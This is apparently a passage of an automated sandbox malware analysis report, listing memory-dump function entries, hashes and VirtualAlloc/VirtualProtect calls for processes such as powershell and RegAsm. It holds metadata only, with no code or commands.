                                                                                                                                  • Opcode ID: 4515d76507d32c964925622fcab813619ff1768f7d6970904d11032db455081a
                                                                                                                                  • Instruction ID: 96bd9c6e05b93dfdbf3e73f4a20da47a20ce1ee3296715cf9e94fe1d5b01d854
                                                                                                                                  • Opcode Fuzzy Hash: 4515d76507d32c964925622fcab813619ff1768f7d6970904d11032db455081a
                                                                                                                                  • Instruction Fuzzy Hash: 21418E6188E3C69FE3038B7058261A57FB19F03254F1E41EBD089CF5A3EA68595EC762
                                                                                                                                  Function 00007FFAAC621D15 Relevance: .5, Instructions: 468COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ab6da15adfe61768743d409abfe0efc5bd482bb139dc19429b5bdf6139ad346c
                                                                                                                                  • Instruction ID: f186f732d9680107eb420dc2a8d31d54dfb4942f15743c24664ad4f2441c3392
                                                                                                                                  • Opcode Fuzzy Hash: ab6da15adfe61768743d409abfe0efc5bd482bb139dc19429b5bdf6139ad346c
                                                                                                                                  • Instruction Fuzzy Hash: 22E13B32A0DA468FE796D72CC855AB5B7E1FF56310B0491BAD04DC7193EE28EC46C781
                                                                                                                                  Function 00007FFAAC626A68 Relevance: .2, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2df05a27ad7076ba1e359ddc2fa193e9ba7cedf8c6f00413a1cd145a70f23ebe
                                                                                                                                  • Instruction ID: 0b2bba3339ad9a49541d0e4d6a7eb17662591d0d1cc56cd907047255f1f99efb
                                                                                                                                  • Opcode Fuzzy Hash: 2df05a27ad7076ba1e359ddc2fa193e9ba7cedf8c6f00413a1cd145a70f23ebe
                                                                                                                                  • Instruction Fuzzy Hash: BF4109479CE2D25BF242BBB8E4768FA7F909F1222971CD1B3D0CC89657E904B48987C4
                                                                                                                                  Function 00007FFAAC6249FA Relevance: .1, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d3a1a0599cee088ba1478a694eb23685bd3869ffc6c1daf8a33f92b62cfe2bf5
                                                                                                                                  • Instruction ID: 6a20a39f36d0f834620e4d4df8c6c11f8db3e8899171434213cd23b3957932e7
                                                                                                                                  • Opcode Fuzzy Hash: d3a1a0599cee088ba1478a694eb23685bd3869ffc6c1daf8a33f92b62cfe2bf5
                                                                                                                                  • Instruction Fuzzy Hash: 8121F7136CEA9225D7427778E4698F66F509F4222833C9AB2D0CDC96678E097096CFC4

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFAAC566605 Relevance: .5, Instructions: 472COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1463302391.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac560000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ea04073dcf9fe7204f1db67ebe6b626348ddb204dc0f2984261bad88f00f686f
                                                                                                                                  • Instruction ID: 56babe8b6312b7c7b37c4ef7d8344fcc9bddbc35dded220d5802b11e85724cc3
                                                                                                                                  • Opcode Fuzzy Hash: ea04073dcf9fe7204f1db67ebe6b626348ddb204dc0f2984261bad88f00f686f
                                                                                                                                  • Instruction Fuzzy Hash: 32D165A294EB8B8FF7559B6898159B5BBE4EF52310B0841BAE04DC71D3DD28E809C3D1
                                                                                                                                  Function 00007FFAAC499EFB Relevance: .3, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 858f69fa2bd45f92a76eb1ed804f63938029a2058e0d397876eed5e12eea39d4
                                                                                                                                  • Instruction ID: 67c59789d177a5ae430116e292e14e49923b9a51b7e00968e24ea57bc005cc9b
                                                                                                                                  • Opcode Fuzzy Hash: 858f69fa2bd45f92a76eb1ed804f63938029a2058e0d397876eed5e12eea39d4
                                                                                                                                  • Instruction Fuzzy Hash: 3B716DA384D7968FF345AB6CE8BB4F53FA0EF5221D70882B3D08C8A253ED19645946C4
                                                                                                                                  Function 00007FFAAC564073 Relevance: .2, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1463302391.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac560000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72d5155617393dad18214ef4d6f3939b3af9098c2c9719790add839612b6fb08
                                                                                                                                  • Instruction ID: d520e4c86b2d4278333bec92840841631062801e7fb5500051fb85f408258c99
                                                                                                                                  • Opcode Fuzzy Hash: 72d5155617393dad18214ef4d6f3939b3af9098c2c9719790add839612b6fb08
                                                                                                                                  • Instruction Fuzzy Hash: E4513B72A4DA8B8FF799D72C8411574B7D6DF96220B1C81BAD14EC7193EF24EC098381
                                                                                                                                  Function 00007FFAAC564370 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1463302391.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac560000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 79da80df851db52a5865c8528868f8959b70a136dc9014a41f901543708281e1
                                                                                                                                  • Instruction ID: 3438311ba0d9a9696f1371fafe2a09e43a1692c2edba6fb16d2e04c79b8664a7
                                                                                                                                  • Opcode Fuzzy Hash: 79da80df851db52a5865c8528868f8959b70a136dc9014a41f901543708281e1
                                                                                                                                  • Instruction Fuzzy Hash: DE411972B4EA4A8FF795D72894019B8BBD5EF41220B0C45BAE14EC7193FE14EC4883C1
                                                                                                                                  Function 00007FFAAC499758 Relevance: .1, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7a87a8e20b83f22cddf9751198ac65f423a83c21857a04116fb08a4cdb49354f
                                                                                                                                  • Instruction ID: 300639795da66a9e64c1a4fb43cf3f55da37f5ed94a9391df91988eb77000c65
                                                                                                                                  • Opcode Fuzzy Hash: 7a87a8e20b83f22cddf9751198ac65f423a83c21857a04116fb08a4cdb49354f
                                                                                                                                  • Instruction Fuzzy Hash: 9231F97191CB488FEB589F4CA84A6E97BE0FBA5310F00812FE04DD3252DA34A855CBC6
                                                                                                                                  Function 00007FFAAC37E620 Relevance: .1, Instructions: 128COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1461645406.00007FFAAC37D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC37D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac37d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c601c4ffbb7c35afa15fa963a3a4482ce8b46634bc8599cae306cb9b362c57b
                                                                                                                                  • Instruction ID: a489742d522b18b72e6052b899af88749011a916d31f1d10d4d442d88a0ce0f9
                                                                                                                                  • Opcode Fuzzy Hash: 7c601c4ffbb7c35afa15fa963a3a4482ce8b46634bc8599cae306cb9b362c57b
                                                                                                                                  • Instruction Fuzzy Hash: A541037140EBC48FE756CB2898459527FF0EF57220B1546DFE088CB1A3D629EC4AC7A2
                                                                                                                                  Function 00007FFAAC49A47C Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6528973929c51a13619cf99567663d858976c4750a7fa0dc920bc6884b922f11
                                                                                                                                  • Instruction ID: 0efc3caccb8a64136443341048251eedf97af067d4dc9e0c8ef8011e222a9c02
                                                                                                                                  • Opcode Fuzzy Hash: 6528973929c51a13619cf99567663d858976c4750a7fa0dc920bc6884b922f11
                                                                                                                                  • Instruction Fuzzy Hash: FF21063190CB4C8FEB59DBAC984E6E97FE0EB96321F04816BD048C3152DA749459C792
                                                                                                                                  Function 00007FFAAC5640BF Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1463302391.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac560000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b3fffd16834d3aa7f5fea2c3440b4c5e33942552155f591e91005cf846dba367
                                                                                                                                  • Instruction ID: c6b2363b718151617fed85db68908fea48b861bf2daac113a49cbabfecbdc8bb
                                                                                                                                  • Opcode Fuzzy Hash: b3fffd16834d3aa7f5fea2c3440b4c5e33942552155f591e91005cf846dba367
                                                                                                                                  • Instruction Fuzzy Hash: 7821287294FA8B8FF3A5DB1C8455574A7D6EF52210B5D81BAE14EC7192EF28DC088381
                                                                                                                                  Function 00007FFAAC5643BC Relevance: .1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1463302391.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac560000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7e17f8fd83a2fb63592a93db59a362a4fdc13077083093f6627ee01dc51912fa
                                                                                                                                  • Instruction ID: b4186c70cb835896762f6cf496d9574bebfd425663e81007ee34a0217a4cf574
                                                                                                                                  • Opcode Fuzzy Hash: 7e17f8fd83a2fb63592a93db59a362a4fdc13077083093f6627ee01dc51912fa
                                                                                                                                  • Instruction Fuzzy Hash: E5113632A4E6868FF7A5DB2880555B8BBD5EF0221074C80BAE04EC7093EF18EC488381
                                                                                                                                  Function 00007FFAAC4933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2d3908d20ae3f0a7a33d9f29d7df179fd503af350b28ca39dec56b6d960911ef
                                                                                                                                  • Instruction ID: 5910eff218ebdd6503179abbb95655a93dd30ac77fa8d77108b8420d4812b2c2
                                                                                                                                  • Opcode Fuzzy Hash: 2d3908d20ae3f0a7a33d9f29d7df179fd503af350b28ca39dec56b6d960911ef
                                                                                                                                  • Instruction Fuzzy Hash: A101677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FFAAC498995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                                                                  • API String ID: 0-3666970850
                                                                                                                                  • Opcode ID: 5f65942898c38fc1f3c10d200d365df9309382c50be17722f3a1a3b6dfb71815
                                                                                                                                  • Instruction ID: d35940428919eefdc32c4674d1ebce29aa054684d31009f8d8d3ad9e40537d40
                                                                                                                                  • Opcode Fuzzy Hash: 5f65942898c38fc1f3c10d200d365df9309382c50be17722f3a1a3b6dfb71815
                                                                                                                                  • Instruction Fuzzy Hash: DE41B4A390EBD29FF356471C5869095BFE0FF63318F0982F7C0898B593E91E980A4295
                                                                                                                                  Function 00007FFAAC4989FA Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1462397504.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffaac490000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                                                                  • API String ID: 0-3666970850
                                                                                                                                  • Opcode ID: 2192ab3dfbeb8bc7451ebe53ff098baa907e764b52cb8f577aa89b6849b2f800
                                                                                                                                  • Instruction ID: a6a97321969f68059fd8b14eba706c9e1eab0727f6dc09c92731743ca6976552
                                                                                                                                  • Opcode Fuzzy Hash: 2192ab3dfbeb8bc7451ebe53ff098baa907e764b52cb8f577aa89b6849b2f800
                                                                                                                                  • Instruction Fuzzy Hash: 6B31B6E390EBD38BF246471C5869095AFD0FF53329F0981F6C48D86583E91EA80A42D5

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0000000140001140 Relevance: .0, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.1435885192.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_140000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                                                  • Instruction ID: e76669c8f4f670c94b621c8b927ebc9d9c9485ce5bf3cc4b479e0f1cdb2a001a
                                                                                                                                  • Opcode Fuzzy Hash: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                                                  • Instruction Fuzzy Hash: B7B012B050030884E306AF13F8413C93660674C7C0F400000F70813372C67940404B10

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:8.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:87%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:23
                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                  execution_graph 28174 7ffaac45ed80 28177 7ffaac4597a0 28174->28177 28176 7ffaac45a94a 28177->28176 28178 7ffaac46aa20 28177->28178 28179 7ffaac46ad8d VirtualAlloc 28178->28179 28180 7ffaac46ade5 28179->28180 28180->28176 28185 7ffaac62c7ff 28186 7ffaac62c847 VirtualProtect 28185->28186 28188 7ffaac62c90d 28186->28188 28181 7ffaac459705 28182 7ffaac459708 28181->28182 28183 7ffaac46ad8d VirtualAlloc 28182->28183 28184 7ffaac46ade5 28183->28184 28189 7ffaac45b774 28190 7ffaac45b78e 28189->28190 28191 7ffaac45b96c 28190->28191 28193 7ffaac45b708 28190->28193 28199 7ffaac4596f0 VirtualAlloc 28191->28199 28194 7ffaac45b98e 28200 7ffaac459748 VirtualAlloc 28194->28200 28196 7ffaac45b9c0 28201 7ffaac459750 VirtualAlloc 28196->28201 28198 7ffaac45b927 28198->28193 28199->28194 28200->28196 28201->28198

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFAAC459705 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 748COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2876314759.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac450000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: fa58233e9486b236743accb12559289fdb587fedc6dd80af6281d38bf9894e86
                                                                                                                                  • Instruction ID: 9b19ca8dd191f8eed23ee8a6eeef98fd6037c71e06d8170657d3a5af27b3d125
                                                                                                                                  • Opcode Fuzzy Hash: fa58233e9486b236743accb12559289fdb587fedc6dd80af6281d38bf9894e86
                                                                                                                                  • Instruction Fuzzy Hash: D1429370909B4D8FEB85EF68C859AEDBBF0FF55304F0041AAD409D7296DB34A985CB81
                                                                                                                                  Function 00007FFAAC459750 Relevance: 1.8, APIs: 1, Instructions: 511memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1495 7ffaac459750-7ffaac46a9eb 1498 7ffaac46a9ed 1495->1498 1499 7ffaac46a9f2-7ffaac46aa3b 1495->1499 1498->1499 1502 7ffaac46aa3d 1499->1502 1503 7ffaac46aa42-7ffaac46aa95 1499->1503 1502->1503 1506 7ffaac46aa9c-7ffaac46aae9 1503->1506 1507 7ffaac46aa97 1503->1507 1510 7ffaac46aaf0-7ffaac46ab40 1506->1510 1511 7ffaac46aaeb 1506->1511 1507->1506 1514 7ffaac46ab47-7ffaac46abb8 call 7ffaac4598e8 1510->1514 1515 7ffaac46ab42 1510->1515 1511->1510 1519 7ffaac46abbf-7ffaac46abcd 1514->1519 1520 7ffaac46abba 1514->1520 1515->1514 1521 7ffaac46ac6e-7ffaac46ade3 VirtualAlloc 1519->1521 1522 7ffaac46abd3-7ffaac46ac6d call 7ffaac468dd0 call 7ffaac459510 call 7ffaac45a480 1519->1522 1520->1519 1536 7ffaac46adeb-7ffaac46ae4f 1521->1536 1537 7ffaac46ade5 1521->1537 1522->1521 1537->1536
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2876314759.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac450000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: e1844d9763daa07e2b240854d968c52fa168a3fd619239a926b5dd3e00b70e9d
                                                                                                                                  • Instruction ID: f16c5d606caadc47b89414dc50cbf17a29bc45b9a8965b95f4399f39c6ef86c0
                                                                                                                                  • Opcode Fuzzy Hash: e1844d9763daa07e2b240854d968c52fa168a3fd619239a926b5dd3e00b70e9d
                                                                                                                                  • Instruction Fuzzy Hash: 67F18070909B8D8FDB85DF68C859AE9BBF0FF5A304F0041AAD449D7252DB34A985CB81
                                                                                                                                  Function 00007FFAAC459780 Relevance: 1.7, APIs: 1, Instructions: 481memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1542 7ffaac459780-7ffaac459799 1544 7ffaac45979b-7ffaac46aa3b 1542->1544 1545 7ffaac4597ac-7ffaac4597c9 1542->1545 1548 7ffaac46aa3d 1544->1548 1549 7ffaac46aa42-7ffaac46aa95 1544->1549 1548->1549 1552 7ffaac46aa9c-7ffaac46aae9 1549->1552 1553 7ffaac46aa97 1549->1553 1556 7ffaac46aaf0-7ffaac46ab40 1552->1556 1557 7ffaac46aaeb 1552->1557 1553->1552 1560 7ffaac46ab47-7ffaac46abb8 call 7ffaac4598e8 1556->1560 1561 7ffaac46ab42 1556->1561 1557->1556 1565 7ffaac46abbf-7ffaac46abcd 1560->1565 1566 7ffaac46abba 1560->1566 1561->1560 1567 7ffaac46ac6e-7ffaac46ade3 VirtualAlloc 1565->1567 1568 7ffaac46abd3-7ffaac46ac6d call 7ffaac468dd0 call 7ffaac459510 call 7ffaac45a480 1565->1568 1566->1565 1582 7ffaac46adeb-7ffaac46ae4f 1567->1582 1583 7ffaac46ade5 1567->1583 1568->1567 1583->1582
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2876314759.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac450000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: ef57bf65bc31221fb02bbb23200a248d3dc2ed3b7fddf6bb324fcd4cb72b218f
                                                                                                                                  • Instruction ID: 2c1bd37a5c1de2ae4b0e49151dd5b35d448286cf378eb47a96ab9d9080f039b5
                                                                                                                                  • Opcode Fuzzy Hash: ef57bf65bc31221fb02bbb23200a248d3dc2ed3b7fddf6bb324fcd4cb72b218f
                                                                                                                                  • Instruction Fuzzy Hash: 01F18D70909B8D8FDB85DF68C859AE9BBF0FF5A310F0041AAD449D7252DB34A985CB81
                                                                                                                                  Function 00007FFAAC62C7FF Relevance: 1.7, APIs: 1, Instructions: 167memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2897256423.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac610000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 341905669b44fc2ae17515f7328379ad2aad04ab9205593c81765421c54cf0c1
                                                                                                                                  • Instruction ID: 13ce191a47385558c13fdfd5362a93e769e02f66158643a4b80b543631573754
                                                                                                                                  • Opcode Fuzzy Hash: 341905669b44fc2ae17515f7328379ad2aad04ab9205593c81765421c54cf0c1
                                                                                                                                  • Instruction Fuzzy Hash: B0510874D0861C8FDB94DF98C885BEDBBF1FB69311F10916AD449E3251DB70A985CB80
                                                                                                                                  Function 00007FFAAC563001 Relevance: .7, Instructions: 739COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2887693381.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac560000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: acbfe913fdca6144ff7bd9b396b8a177524383f3f641520f24125145db9eb467
                                                                                                                                  • Instruction ID: 38d6fce815b86698f1f5ced3bde15c3338b79b15b9cb77777a3eac61efc572f3
                                                                                                                                  • Opcode Fuzzy Hash: acbfe913fdca6144ff7bd9b396b8a177524383f3f641520f24125145db9eb467
                                                                                                                                  • Instruction Fuzzy Hash: A4327071959A8ACFFB94DB5CC8557E8B7F5EF5A310F0481B6E00DD3182CA38A8498BD0
                                                                                                                                  Function 00007FFAAC563B5D Relevance: .6, Instructions: 573COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2887693381.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac560000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48093990d2f978bacf66c0235417d28e206e1509f7cbacfae06f297352956d6c
                                                                                                                                  • Instruction ID: 257227599835a85193648ccff80d34b9352096551cf3e2e38053c76c2392d452
                                                                                                                                  • Opcode Fuzzy Hash: 48093990d2f978bacf66c0235417d28e206e1509f7cbacfae06f297352956d6c
                                                                                                                                  • Instruction Fuzzy Hash: EB220930D4965ECFEBA4DB58C4557ACB7B5FF5A304F144179E00DA3292DB34A889CB90
                                                                                                                                  Function 00007FFAAC563162 Relevance: .2, Instructions: 161COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2887693381.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac560000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6cf4152fc46ada0e0d544e2cd4f814a8c177fe82cba76125ba45365692103cfd
                                                                                                                                  • Instruction ID: f2387f630b2cb203a87a9cc23189afd76532f7b96b7e455ebd2a2e7f71dae3ec
                                                                                                                                  • Opcode Fuzzy Hash: 6cf4152fc46ada0e0d544e2cd4f814a8c177fe82cba76125ba45365692103cfd
                                                                                                                                  • Instruction Fuzzy Hash: 4C5118B1D5964ACBFB94DB5CC8457BDB7F5EF5A300F148175E00DA2182CA34A989CB90
